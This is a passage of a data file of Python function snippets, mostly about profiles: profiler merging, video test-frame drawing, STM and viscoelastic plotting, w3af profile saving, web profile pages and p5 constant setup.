assert based on the name as we merge also based on\r\n #the name.\r\n assert set([l.name for l in prof1[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert set([l.name for l in prof2[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert len(new_t) == len(new_opt) == len(new_sub_profile)\r\n return (new_opt, new_t, prof1[2] + prof2[2],\r\n prof1[3] + prof2[3],\r\n -1, -1, new_sub_profile, [])", "def genFrameImages((widthPixels, heightPixels), flashColourGen, flashColourGenPipTrain, numFrames, FPS, superSamplingScale=8, BG_COLOUR=(0,0,0), TEXT_COLOUR=(255,255,255), GFX_COLOUR=(255,255,255), title=\"\", TITLE_COLOUR=(255,255,255), FRAMES_AS_FIELDS=False, frameSkipChecker=None, segments=[]):\n\n # we're going to draw a larger (super sampled) image and then scale it down\n # to get smoothing (compensating for the lack of anti-aliased drawing functions\n # in PIL)\n\n width = widthPixels * superSamplingScale\n height = heightPixels * superSamplingScale\n\n flashCols = list(flashColourGen)[0:numFrames]\n flashColsPipTrain = list(flashColourGenPipTrain)[0:numFrames]\n\n # we'll pretend we're working within a rectangle (0,0) - (160,90)\n # and use a scaling function to map to out actual dimensions\n scaler = AspectPreservingCoordinateScaler((160,90),(width,height))\n\n # load a font for text\n font = loadFont(sizePt = scaler.s(4))\n smallfont = loadFont(sizePt = scaler.s(4))\n \n # work out the segment description text, then check its size and adjust the fontsize to ensure it fits within bounding area\n if segments:\n segment_description_text = \"\\n\".join(map(lambda seg : seg[\"description\"], segments))\n tmpimg = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n tmpdraw = ImageDraw.Draw(tmpimg)\n w,h = tmpdraw.multiline_textsize(segment_description_text, font=smallfont)\n max_w, max_h = scaler.xy((140,13))\n \n shrink_factor = min(float(max_w) / w, float(max_h) / h, 1)\n smallfont = loadFont(sizePt = scaler.s(4*shrink_factor))\n \n poy = 0 # pie Y offset\n dfy = 65 # duration and FPS labels Y offset\n if segments:\n poy = -10\n dfy = 19\n\n\n\n WHITE=(255,255,255)\n BLACK=(0,0,0)\n\n if FRAMES_AS_FIELDS:\n imageName = \"field\"\n labelFps = FPS / 2\n else:\n imageName = \"frame\"\n labelFps = FPS\n\n\n for frameNum in range(0,numFrames):\n if frameSkipChecker is not None:\n shouldSkip=frameSkipChecker(frameNum)\n if shouldSkip:\n yield None\n continue\n\n timecode = frameNumToTimecode(frameNum, FPS, framesAreFields=FRAMES_AS_FIELDS)\n timeSecs = float(frameNum) / FPS\n nextTimeSecs = float(frameNum+1) / FPS # time of next frame after this\n durationTimecode = frameNumToTimecode(numFrames, FPS)\n\n # create black image and an object to let us draw on it\n img = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n draw = ImageDraw.Draw(img)\n\n # draw a flashing rectangular box on the left side\n flashColour = flashCols[frameNum]\n topLeft = scaler.xy((10, 30))\n bottomRight = scaler.xy((40, 60))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=GFX_COLOUR)\n topLeft = scaler.xy((11, 31))\n bottomRight = scaler.xy((39, 59))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=flashColour)\n\n # draw text label explaining to attach light sensor to the flashing box\n topLeft = scaler.xy((41, 37))\n draw.text(topLeft, \"Use light detector\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 41))\n draw.text(topLeft, \"on centre of\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 45))\n draw.text(topLeft, \"this box\", font=font, 
fill=TEXT_COLOUR)\n\n # draw text labels giving frame number, timecode and seconds covered by this frame\n topLeft = scaler.xy((10, 4))\n draw.text(topLeft, timecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 9))\n draw.text(topLeft, \"%06d of %d %ss\" % (frameNum, numFrames, imageName), font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 14))\n draw.text(topLeft, u\"%08.3f \\u2264 t < %08.3f secs\" % (timeSecs, nextTimeSecs), font=font, fill=TEXT_COLOUR)\n\n topLeft = scaler.xy((10,dfy))\n draw.text(topLeft, \"Duration: \" + durationTimecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10,dfy+5))\n draw.text(topLeft, \"%d fps\" % labelFps, font=font, fill=TEXT_COLOUR)\n\n # and more text labels, but this time right justified\n text = title\n w,h = font.getsize(text)\n topLeft = scaler.xy((150,4))\n topLeft = topLeft[0] - w, topLeft[1]\n draw.text(topLeft, text, font=font, fill=TITLE_COLOUR)\n\n # draw an outer ring segment indicating the time period covered by the current frame\n topLeft = scaler.xy((105, 20+poy))\n bottomRight = scaler.xy((155, 70+poy))\n angle1 = 360 * (frameNum % FPS) / FPS\n angle2 = 360 * ((frameNum % FPS) + 1) / FPS\n draw.pieslice(topLeft + bottomRight, start=270+angle1, end=270+angle2, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n topLeft = scaler.xy((108, 23+poy))\n bottomRight = scaler.xy((152, 67+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n\n\n # draw frame num ring\n topLeft = scaler.xy((110, 25+poy))\n bottomRight = scaler.xy((150, 65+poy))\n angle = 360 * (frameNum % FPS) / FPS\n if (frameNum / FPS) % 2 == 0: # if this is an even second (0-0.9, 2-2.9, 4-4.9 etc)\n draw.pieslice(topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n else:\n draw.pieslice(topLeft + bottomRight, start=270+angle, end=270+360, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n topLeft = scaler.xy((113, 28+poy))\n bottomRight = scaler.xy((147, 62+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n \n # draw outer for segments\n if segments:\n topLeft = scaler.xy((115-0.25, 30+poy-0.25))\n bottomRight = scaler.xy((145+0.25, 60+poy+0.25))\n draw.ellipse(topLeft + bottomRight, fill=WHITE, outline=None)\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n draw.ellipse(topLeft + bottomRight, fill=BLACK, outline=None)\n\n # draw progress pie\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n angle = 360.0*frameNum/numFrames\n precise_filled_pieslice(draw, topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n\n # draw segments over the pieslice\n if segments:\n for i in range(0, len(segments)):\n angle = math.radians(270 + 360.0*segments[i][\"startSecs\"]/numFrames*FPS)\n centre = scaler.xy((130,45+poy))\n armEnd = scaler.xy((130 + 15*math.cos(angle), 45+poy + 15*math.sin(angle)))\n draw.line([centre, armEnd], fill=WHITE, width=int(scaler.s(0.25)))\n \n segStartFrame = segments[i][\"startSecs\"] * FPS\n nextStartFrame = segments[(i+1) % len(segments)][\"startSecs\"] * FPS\n if nextStartFrame <= segStartFrame:\n nextStartFrame += numFrames\n midAngle = math.radians(270 + 360.0* (segStartFrame+nextStartFrame)/2/numFrames)\n w,h = font.getsize(segments[i][\"label\"])\n centre = scaler.xy((130 + 15*math.cos(midAngle)*0.7, 45+poy + 15*math.sin(midAngle)*0.7))\n topLeft = centre[0] - w/2, centre[1] - h/2\n draw.text(topLeft, 
segments[i][\"label\"], fill=WHITE, font=font)\n\n # draw segment long labels\n topLeft = scaler.xy((10,61))\n draw.multiline_text(topLeft, segment_description_text, fill=WHITE, font=smallfont)\n \n # draw pulse train at the bottom\n LIM=FPS\n NUM_BLOBS = 2*LIM + 1\n blobSpacing = 150.0/NUM_BLOBS\n\n for offset in range(-LIM, +LIM+1):\n left = 80+blobSpacing*(offset-0.5)\n right = 80+blobSpacing*(offset+0.5)\n\n topLeft = scaler.xy(( left, 80 ))\n bottomRight = scaler.xy(( right, 85 ))\n\n seqIndex = offset + frameNum\n if seqIndex >= 0 and seqIndex < numFrames:\n colour = flashColsPipTrain[seqIndex]\n draw.rectangle(topLeft + bottomRight, outline=None, fill = colour)\n\n if offset == 0:\n # draw blob above\n topLeft = scaler.xy(( left, 75 ))\n bottomRight = scaler.xy(( right, 80 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # and below\n topLeft = scaler.xy(( left, 85 ))\n bottomRight = scaler.xy(( right, 90 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # shrink the image using high quality downsampling\n try:\n scalingMode = Image.LANCZOS\n except AttributeError:\n scalingMode = Image.BICUBIC\n\n rescaledImage = img.resize((widthPixels,heightPixels), scalingMode)\n\n yield rescaledImage", "def profile(script, argv, timer, pickle_protocol, dump_filename, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n __profile__(filename, code, globals_,\n timer=timer, pickle_protocol=pickle_protocol,\n dump_filename=dump_filename, mono=mono)", "def stm_profile_plot(flat_file, points, scan_dir=0, cmap=None, vmin=None, vmax=None, xy_ticks=4, z_ticks=4):\n nm = 10 ** -9 # Define the nanometer to meter conversion.\n\n fig, ax = plt.subplots() # Create an instance of a pyplot figure and axis.\n\n # Set the minimum of the scan data to zero.\n figure_data = (flat_file[scan_dir].data - np.amin(flat_file[scan_dir].data)) / nm\n\n if cmap is None: # If no color scheme is given use hot as default.\n cmap = 'hot'\n\n if vmin is None: # If no z-axis minimum is given use minimum of the image data.\n vmin = np.amin(figure_data)\n if vmax is None: # If no z-axis maxmimum is given use 125% of the maximum in the image data.\n vmax = 1.25 * np.amax(figure_data)\n\n # Add image plot to the axis and define it so that the color map can be generated.\n cax = ax.imshow(figure_data, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n\n # Convert nanometer values into pixel numbers.\n for point in range(len(points)):\n points[point][0] = nm2pnt(points[point][0], flat_file, axis='x')\n points[point][1] = nm2pnt(points[point][1], flat_file, axis='y')\n\n # Plot the line profile points on the axis.\n ax.plot(points[:, 0], points[:, 1], 'bo-')\n\n xy_units = flat_file[scan_dir].info['unitxy'] # Get xy units.\n\n x_res = flat_file[scan_dir].info['xres'] # Get number of x-axis pixels.\n y_res = flat_file[scan_dir].info['yres'] # Get number of y-axis pixels.\n\n x_max = flat_file[scan_dir].info['xreal'] # Get x-axis image size.\n y_max = flat_file[scan_dir].info['yreal'] # get y-axis image size.\n\n # Set the x-axis ticks from number given.\n ax.set_xticks([x for x in np.arange(0, x_res + 1, x_res / xy_ticks)])\n # Set the x-axis tick labels from image size.\n ax.set_xticklabels([str(np.round(x, 1)) for x in np.arange(0, x_max + 1, x_max / xy_ticks)])\n\n # Set the y-axis ticks from number given\n ax.set_yticks([y for y in np.arange(0, y_res + 1, y_res / xy_ticks)])\n # Set the y-axis tick labels from image size.\n 
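# stm_profile_plot() leans on an nm2pnt() helper to convert physical nm
# positions into pixel indices before plotting. Its implementation is not
# shown in this snippet, so the function below is only an assumed sketch of
# the linear mapping such a helper typically performs.
import numpy as np

def nm_to_pixel(value_nm, axis_length_nm, axis_pixels):
    """Map a physical position to the nearest pixel index, clipped to bounds."""
    idx = int(round(value_nm / axis_length_nm * (axis_pixels - 1)))
    return int(np.clip(idx, 0, axis_pixels - 1))

# Example: the centre of a 100 nm scan sampled at 512 pixels.
assert nm_to_pixel(50.0, 100.0, 512) == 256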
ax.set_yticklabels([str(np.round(y, 1)) for y in np.arange(0, y_max + 1, y_max / xy_ticks)])\n\n # Set the x- and y-axis labels.\n ax.set_xlabel(xy_units, size=16, weight='bold')\n ax.set_ylabel(xy_units, size=16, weight='bold')\n\n # Define the limits of the plot.\n ax.set_xlim([0, x_res])\n ax.set_ylim([0, y_res])\n\n # St the plot title with the image setpoint parameters.\n ax.set_title('Set-Points: {voltage} V, {current} pA'.format(voltage=flat_file[scan_dir].info['vgap'],\n current=np.round(\n flat_file[scan_dir].info['current']*10**12)))\n\n # Define list containing the z-axis ticks from number given.\n cbar_ticks = [z for z in np.arange(vmin, vmax * 1.01, vmax / z_ticks)]\n # Define the z-axis tick labels.\n cbar_ticklabels = [str(np.round(z, 1)) for z in np.arange(vmin, vmax + 1, vmax / z_ticks)]\n # Create color bar.\n cbar = fig.colorbar(cax, ticks=cbar_ticks)\n # Set the color bar tick labels.\n cbar.ax.set_yticklabels(cbar_ticklabels, size=16)\n # Set color bar label.\n cbar.set_label('Height [' + xy_units + ']', size=18, weight='bold')\n\n plt.show()", "def magic_profile(self, parameter_s=''):\n if self.rc.profile:\n printpl('Current IPython profile: $self.rc.profile.')\n else:\n print 'No profile active.'", "def save_current_to_profile(self, profile_name, prof_desc='', prof_path='',\n self_contained=False):\n # Open the already existing profile\n new_profile = profile(profile_name, workdir=os.path.dirname(prof_path))\n\n # shortcut\n w3af_plugins = self._w3af_core.plugins\n\n # Save the enabled plugins\n for plugin_type in w3af_plugins.get_plugin_types():\n enabled_plugins = []\n for plugin_name in w3af_plugins.get_enabled_plugins(plugin_type):\n enabled_plugins.append(plugin_name)\n new_profile.set_enabled_plugins(plugin_type, enabled_plugins)\n\n # Save the plugin options\n for plugin_type in w3af_plugins.get_plugin_types():\n for plugin_name in w3af_plugins.get_enabled_plugins(plugin_type):\n plugin_options = w3af_plugins.get_plugin_options(plugin_type,\n plugin_name)\n if plugin_options:\n new_profile.set_plugin_options(plugin_type,\n plugin_name,\n plugin_options,\n self_contained=self_contained)\n\n # Save the profile targets\n targets = cf.cf.get('targets')\n if targets:\n new_profile.set_target(' , '.join(t.url_string for t in targets))\n\n # Save the misc and http settings\n misc_settings = MiscSettings()\n new_profile.set_misc_settings(misc_settings.get_options())\n new_profile.set_http_settings(\n self._w3af_core.uri_opener.settings.get_options())\n\n # Save the profile name and description\n new_profile.set_desc(prof_desc)\n new_profile.set_name(profile_name)\n\n # Save the profile to the file\n new_profile.save(profile_name)\n\n return new_profile", "def __init__(self, velocity, vorticity, prof_coords, \n direction, beginMeanComput, **kwds):\n assert 'variables' not in kwds, 'variables parameter is useless.'\n super(Profiles, self).__init__(variables=[velocity, vorticity],\n **kwds)\n ## velocity field\n self.velocity = velocity\n ## vorticity field\n self.vorticity = vorticity\n ## X and Y coordinates of the profile\n self.prof_coords = prof_coords\n ## profile direction (0, 1 or 2)\n self.direction = direction\n ## time at which the computation of mean profile must begin\n self.beginMeanComput = beginMeanComput\n self.input = [velocity, vorticity]\n self.output = []", "def _profile(self) -> None:\n if self.use_case.profile:\n if self._profile_stats is None:\n self._profile_stats = pstats.Stats()\n if self._current_profiler is not None:\n 
self._current_profiler.disable()\n                self._profile_stats.add(self._current_profiler)\n            # TODO: use clear() instead of always creating a new profile\n            self._current_profiler = cProfile.Profile()\n            self._current_profiler.enable()

def plot_visco_profiles(pointsh5, skip=slice(None,None,1), xscale=1e3, yscale=1e-2, tscale=3.1536e7, adjustRadial=False, benchmark=[], title=None):\n\tplt.figure()\n\n\tcoords,data,number,times = pu.load_h5_visco(pointsh5)\n\n\t#x = 1e3*np.loadtxt(points,usecols=[0]) # output_points2.txt\n\t#y = np.zeros_like(x)\n\tx = coords[:,0]\n\ty = np.zeros_like(x)\n\n\t# NOTE: plot elastic solution by passing dictionary as showelastic\n\t# Plot analytic elastic solution (t=0)\n\t#print(benchmark)\n\tif len(benchmark)>=1:\n\t\tur = np.zeros_like(x)\n\t\tuz = np.zeros_like(x)\n\t\tfor b in benchmark:\n\t\t\turi,uzi = m.calc_mogi_dp(x,y,**b)\n\t\t\tur += uri\n\t\t\tuz += uzi\n\t\tplt.plot(x*xscale,uz*yscale,'ko',label='benchmark')\n\n\t# Convert units\n\t#ur = np.hypot(data[:,:,0], data[:,:,1]) #assume profiles are along EW profile\n\tur = data[:,:,0]\n\tuz = data[:,:,2]\n\tx = x / xscale\n\tur = ur / yscale #cm\n\tuz = uz / yscale #cm\n\ttimes = times / tscale\n\t#times = times / 8.64e4 #days\n\t#times = times / 31536000 #years\n\n\t#plots = np.arange(0,times.size,skip)\n\t#print(plots.size)\n\t#way to cycle through markers if plotting many lines\n\t#marker = itertools.cycle(['o','^','s','D']) #plot(marker=marker.next() iterates list)\n\t#way to use gradually changing colors from a colormap\n\t#color = plt.cm.jet(1.0*i/plots.size)\n\tindplots = np.arange(times.size-1)\n\tprint(indplots)\n\tindplots = indplots[skip]\n\tprint(indplots)\n\tfor i in indplots:\n\t\tline, = plt.plot(x, uz[i], color=plt.cm.jet(1.0*i/indplots[-1]), label='{:.1f}'.format(times[i]))\n\t\tplt.plot(x, ur[i], ls='dashed', color=line.get_color())\n\t#print uz[i]\n\t#print uz[i-1]\n\n\tif title:\n\t\tplt.title(title)\n\telse:\n\t\tplt.title(pointsh5)\n\n\tplt.axhline(color='k',linestyle='dashed')\n\tplt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n\tplt.ylabel('Displacement [{}]'.format(get_unit(yscale)))\n\tplt.legend(title='{}'.format(get_unit(tscale)))\n\tplt.grid()\n\tplt.show()

def run_profile(package, profile_config):\n\n    LOG.info(\"Running '%(name)s' [%(profile)s]\" % profile_config )\n\n    profile = load_profile(package, profile_config)\n    if not profile:\n        return\n\n    # create a subfolder for generator profiles\n    if package.__name__ == \"pickup.generator_profile\":\n\n        # first folder level is the module name. Append this to the staging area\n        module_folder = profile.__name__.split(\".\")[-1]\n        module_folder = join(config_instance.STAGING_AREA, module_folder)\n\n        # into the module folder we put a folder based on the profile's name\n        staging_folder = get_profile_folder(module_folder, profile_config)\n\n        # just in case it does not exist, we'll create all required folders\n        if not exists( staging_folder ):\n            os.makedirs( staging_folder )\n            LOG.debug( \"Created directory %r\" % staging_folder )\n    else:\n        staging_folder = config_instance.STAGING_AREA\n\n    try:\n        profile.run(staging_folder)\n    except Exception, exc:\n        LOG.error(\"Error staging '%s'. 
Error message: %s\" %\n (profile_config['name'], exc))\n LOG.exception(exc)", "def paintSkirt(self):\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(os.path.join(PATH_EDITOR_IMG, self.avatarConfiguration[\"gender\"], self.avatarConfiguration[\"bodySize\"], self.avatarConfiguration[\"typeSkirt\"]+\"_skirt\", self.avatarConfiguration[\"skirt\"] + IMG_EXTENSION))\n self.newAvatarImage(imgPath, \"skirt\")", "def update_annot(ind):\n # update text annotation\n pos = sc.get_offsets()[ind[\"ind\"][0]]\n annot.xy = pos\n idxlist = []\n for element in PC:\n idxlist.append(np.allclose(element, pos))\n idx = idxlist.index(True)\n annotation_string = f'{idx + 1}\\n'\n if display_parameter_values:\n for i, label in enumerate(parameterList):\n annotation_string += (f'{parameters[i, idx]: 10.2f} '\n f'+/- {errors[i, idx]:8.2f} '\n f'({label})\\n')\n annot.set_text(annotation_string[:-1])\n annot.get_bbox_patch().set_alpha(0.4)\n\n # update immage annotation\n label = mapp.listOfFiles[idx].split(os.sep)[-1].split('.')[0]\n image = get_image(mapp.pltdir, label)\n ab.xy = pos\n ab.offsetbox = OffsetImage(image)\n ax.add_artist(ab)\n if show_both_images:\n additional_image = get_image(additional_fitplot_folder, label)\n ac.xy = pos + shift_second_image\n ac.offsetbox = OffsetImage(additional_image)\n ax.add_artist(ac)", "def profile(self, r, **attr):\n\n tablename = self.tablename\n get_config = current.s3db.get_config\n\n header = get_config(tablename, \"profile_header\")\n\n # Get the page widgets\n widgets = get_config(tablename, \"profile_widgets\")\n if not widgets and not header:\n # Profile page not configured:\n if r.representation not in (\"dl\", \"aadata\"):\n # Redirect to the Read View\n redirect(r.url(method=\"read\"))\n else:\n # No point redirecting\n r.error(405, current.ERROR.BAD_METHOD)\n\n # Index the widgets by their position in the config\n for index, widget in enumerate(widgets):\n widget[\"index\"] = index\n\n if r.representation == \"dl\":\n # Ajax-update of one datalist\n index = r.get_vars.get(\"update\", None)\n if index:\n try:\n index = int(index)\n except ValueError:\n datalist = \"\"\n else:\n # @ToDo: Check permissions to the Resource & do\n # something different if no permission\n datalist = self._datalist(r, widgets[index], **attr)\n output = {\"item\": datalist}\n\n elif r.representation == \"aadata\":\n # Ajax-update of one datatable\n index = r.get_vars.get(\"update\", None)\n if index:\n try:\n index = int(index)\n except ValueError:\n datalist = \"\"\n else:\n # @ToDo: Check permissions to the Resource & do\n # something different if no permission\n datatable = self._datatable(r, widgets[index], **attr)\n return datatable\n\n else:\n # Default page-load\n\n # Page Title\n title = get_config(tablename, \"profile_title\")\n if not title:\n try:\n title = r.record.name\n except:\n title = current.T(\"Profile Page\")\n elif callable(title):\n title = title(r)\n\n # Page Header\n if not header:\n header = H2(title, _class=\"profile-header\")\n elif callable(header):\n header = header(r)\n\n output = {\"title\": title,\n \"header\": header,\n }\n\n # Update Form, if configured\n update = get_config(tablename, \"profile_update\")\n if update:\n editable = get_config(tablename, \"editable\", True)\n authorised = self._permitted(method=\"update\")\n if authorised and editable:\n show = get_crud_string(tablename, \"title_update\")\n hide = current.T(\"Hide Form\")\n form = self.update(r, **attr)[\"form\"]\n else:\n show = get_crud_string(tablename, 
\"title_display\")\n hide = current.T(\"Hide Details\")\n form = self.read(r, **attr)[\"item\"]\n\n if update == \"visible\":\n hidden = False\n label = hide\n style_hide, style_show = None, \"display:none\"\n else:\n hidden = True\n label = show\n style_hide, style_show = \"display:none\", None\n\n toggle = A(SPAN(label,\n data = {\"on\": show,\n \"off\": hide,\n },\n ),\n ICON(\"down\", _style=style_show),\n ICON(\"up\", _style=style_hide),\n data = {\"hidden\": hidden},\n _class = \"form-toggle action-lnk\",\n )\n form.update(_style=style_hide)\n output[\"form\"] = DIV(toggle,\n form,\n _class = \"profile-update\",\n )\n else:\n output[\"form\"] = \"\"\n\n # Widgets\n response = current.response\n rows = []\n append = rows.append\n row = None\n cols = get_config(tablename, \"profile_cols\")\n if not cols:\n cols = 2\n row_cols = 0\n for widget in widgets:\n\n # Render the widget\n w_type = widget[\"type\"]\n if w_type == \"comments\":\n w = self._comments(r, widget, **attr)\n elif w_type == \"datalist\":\n w = self._datalist(r, widget, **attr)\n elif w_type == \"datatable\":\n w = self._datatable(r, widget, **attr)\n elif w_type == \"form\":\n w = self._form(r, widget, **attr)\n elif w_type == \"map\":\n w = self._map(r, widget, widgets, **attr)\n elif w_type == \"report\":\n w = self._report(r, widget, **attr)\n elif w_type == \"organizer\":\n w = self._organizer(r, widget, **attr)\n elif w_type == \"custom\":\n w = self._custom(r, widget, **attr)\n else:\n if response.s3.debug:\n raise SyntaxError(\"Unsupported widget type %s\" %\n w_type)\n else:\n # ignore\n continue\n\n if row is None:\n # Start new row\n row = DIV(_class=\"row profile\")\n row_cols = 0\n\n # Append widget to row\n row.append(w)\n colspan = widget.get(\"colspan\", 1)\n row_cols += colspan\n if row_cols == cols:\n # Close this row\n append(row)\n row = None\n\n if row:\n # We have an incomplete row of widgets\n append(row)\n output[\"rows\"] = rows\n\n # Activate this if a project needs it\n #response.view = get_config(tablename, \"profile_view\") or \\\n # self._view(r, \"profile.html\")\n response.view = self._view(r, \"profile.html\")\n\n return output", "def pre_draw(p5_instance, draw_func):\n global _CTX_MIDDLE, _DEFAULT_FILL, _DEFAULT_LEADMULT, _DEFAULT_STROKE, _DEFAULT_TEXT_FILL\n\n global ADD, ALT, ARROW, AUTO, AUDIO, AXES, BACKSPACE, BASELINE, BEVEL, BEZIER, BLEND, BLUR, BOLD, BOLDITALIC\n global BOTTOM, BURN, CENTER, CHORD, CLAMP, CLOSE, CONTROL, CORNER, CORNERS, CROSS, CURVE, DARKEST\n global DEG_TO_RAD, DEGREES, DELETE, DIFFERENCE, DILATE, DODGE, DOWN_ARROW, ENTER, ERODE, ESCAPE, EXCLUSION\n global FILL, GRAY, GRID, HALF_PI, HAND, HARD_LIGHT, HSB, HSL, IMAGE, IMMEDIATE, INVERT, ITALIC, LANDSCAPE\n global LEFT, LEFT_ARROW, LIGHTEST, LINE_LOOP, LINE_STRIP, LINEAR, LINES, MIRROR, MITER, MOVE, MULTIPLY, NEAREST\n global NORMAL, OPAQUE, OPEN, OPTION, OVERLAY, P2D, PI, PIE, POINTS, PORTRAIT, POSTERIZE, PROJECT, QUAD_STRIP, QUADRATIC\n global QUADS, QUARTER_PI, RAD_TO_DEG, RADIANS, RADIUS, REPEAT, REPLACE, RETURN, RGB, RIGHT, RIGHT_ARROW\n global ROUND, SCREEN, SHIFT, SOFT_LIGHT, SQUARE, STROKE, SUBTRACT, TAB, TAU, TEXT, TEXTURE, THRESHOLD, TOP\n global TRIANGLE_FAN, TRIANGLE_STRIP, TRIANGLES, TWO_PI, UP_ARROW, VIDEO, WAIT, WEBGL\n\n global frameCount, focused, displayWidth, displayHeight, windowWidth, windowHeight, width, height\n global disableFriendlyErrors, deviceOrientation, accelerationX, accelerationY, accelerationZ\n global pAccelerationX, pAccelerationY, pAccelerationZ, rotationX, rotationY, 
rotationZ\n global pRotationX, pRotationY, pRotationZ, turnAxis, keyIsPressed, key, keyCode, mouseX, mouseY, pmouseX, pmouseY\n global winMouseX, winMouseY, pwinMouseX, pwinMouseY, mouseButton, mouseIsPressed, touches, pixels\n\n _CTX_MIDDLE = p5_instance._CTX_MIDDLE\n _DEFAULT_FILL = p5_instance._DEFAULT_FILL\n _DEFAULT_LEADMULT = p5_instance._DEFAULT_LEADMULT\n _DEFAULT_STROKE = p5_instance._DEFAULT_STROKE\n _DEFAULT_TEXT_FILL = p5_instance._DEFAULT_TEXT_FILL\n\n ADD = p5_instance.ADD\n ALT = p5_instance.ALT\n ARROW = p5_instance.ARROW\n AUDIO = p5_instance.AUDIO\n AUTO = p5_instance.AUTO\n AXES = p5_instance.AXES\n BACKSPACE = p5_instance.BACKSPACE\n BASELINE = p5_instance.BASELINE\n BEVEL = p5_instance.BEVEL\n BEZIER = p5_instance.BEZIER\n BLEND = p5_instance.BLEND\n BLUR = p5_instance.BLUR\n BOLD = p5_instance.BOLD\n BOLDITALIC = p5_instance.BOLDITALIC\n BOTTOM = p5_instance.BOTTOM\n BURN = p5_instance.BURN\n CENTER = p5_instance.CENTER\n CHORD = p5_instance.CHORD\n CLAMP = p5_instance.CLAMP\n CLOSE = p5_instance.CLOSE\n CONTROL = p5_instance.CONTROL\n CORNER = p5_instance.CORNER\n CORNERS = p5_instance.CORNERS\n CROSS = p5_instance.CROSS\n CURVE = p5_instance.CURVE\n DARKEST = p5_instance.DARKEST\n DEG_TO_RAD = p5_instance.DEG_TO_RAD\n DEGREES = p5_instance.DEGREES\n DELETE = p5_instance.DELETE\n DIFFERENCE = p5_instance.DIFFERENCE\n DILATE = p5_instance.DILATE\n DODGE = p5_instance.DODGE\n DOWN_ARROW = p5_instance.DOWN_ARROW\n ENTER = p5_instance.ENTER\n ERODE = p5_instance.ERODE\n ESCAPE = p5_instance.ESCAPE\n EXCLUSION = p5_instance.EXCLUSION\n FILL = p5_instance.FILL\n GRAY = p5_instance.GRAY\n GRID = p5_instance.GRID\n HALF_PI = p5_instance.HALF_PI\n HAND = p5_instance.HAND\n HARD_LIGHT = p5_instance.HARD_LIGHT\n HSB = p5_instance.HSB\n HSL = p5_instance.HSL\n IMAGE = p5_instance.IMAGE\n IMMEDIATE = p5_instance.IMMEDIATE\n INVERT = p5_instance.INVERT\n ITALIC = p5_instance.ITALIC\n LANDSCAPE = p5_instance.LANDSCAPE\n LEFT = p5_instance.LEFT\n LEFT_ARROW = p5_instance.LEFT_ARROW\n LIGHTEST = p5_instance.LIGHTEST\n LINE_LOOP = p5_instance.LINE_LOOP\n LINE_STRIP = p5_instance.LINE_STRIP\n LINEAR = p5_instance.LINEAR\n LINES = p5_instance.LINES\n MIRROR = p5_instance.MIRROR\n MITER = p5_instance.MITER\n MOVE = p5_instance.MOVE\n MULTIPLY = p5_instance.MULTIPLY\n NEAREST = p5_instance.NEAREST\n NORMAL = p5_instance.NORMAL\n OPAQUE = p5_instance.OPAQUE\n OPEN = p5_instance.OPEN\n OPTION = p5_instance.OPTION\n OVERLAY = p5_instance.OVERLAY\n P2D = p5_instance.P2D\n P3D = p5_instance.WEBGL\n PI = p5_instance.PI\n PIE = p5_instance.PIE\n POINTS = p5_instance.POINTS\n PORTRAIT = p5_instance.PORTRAIT\n POSTERIZE = p5_instance.POSTERIZE\n PROJECT = p5_instance.PROJECT\n QUAD_STRIP = p5_instance.QUAD_STRIP\n QUADRATIC = p5_instance.QUADRATIC\n QUADS = p5_instance.QUADS\n QUARTER_PI = p5_instance.QUARTER_PI\n RAD_TO_DEG = p5_instance.RAD_TO_DEG\n RADIANS = p5_instance.RADIANS\n RADIUS = p5_instance.RADIUS\n REPEAT = p5_instance.REPEAT\n REPLACE = p5_instance.REPLACE\n RETURN = p5_instance.RETURN\n RGB = p5_instance.RGB\n RIGHT = p5_instance.RIGHT\n RIGHT_ARROW = p5_instance.RIGHT_ARROW\n ROUND = p5_instance.ROUND\n SCREEN = p5_instance.SCREEN\n SHIFT = p5_instance.SHIFT\n SOFT_LIGHT = p5_instance.SOFT_LIGHT\n SQUARE = p5_instance.SQUARE\n STROKE = p5_instance.STROKE\n SUBTRACT = p5_instance.SUBTRACT\n TAB = p5_instance.TAB\n TAU = p5_instance.TAU\n TEXT = p5_instance.TEXT\n TEXTURE = p5_instance.TEXTURE\n THRESHOLD = p5_instance.THRESHOLD\n TOP = p5_instance.TOP\n TRIANGLE_FAN = 
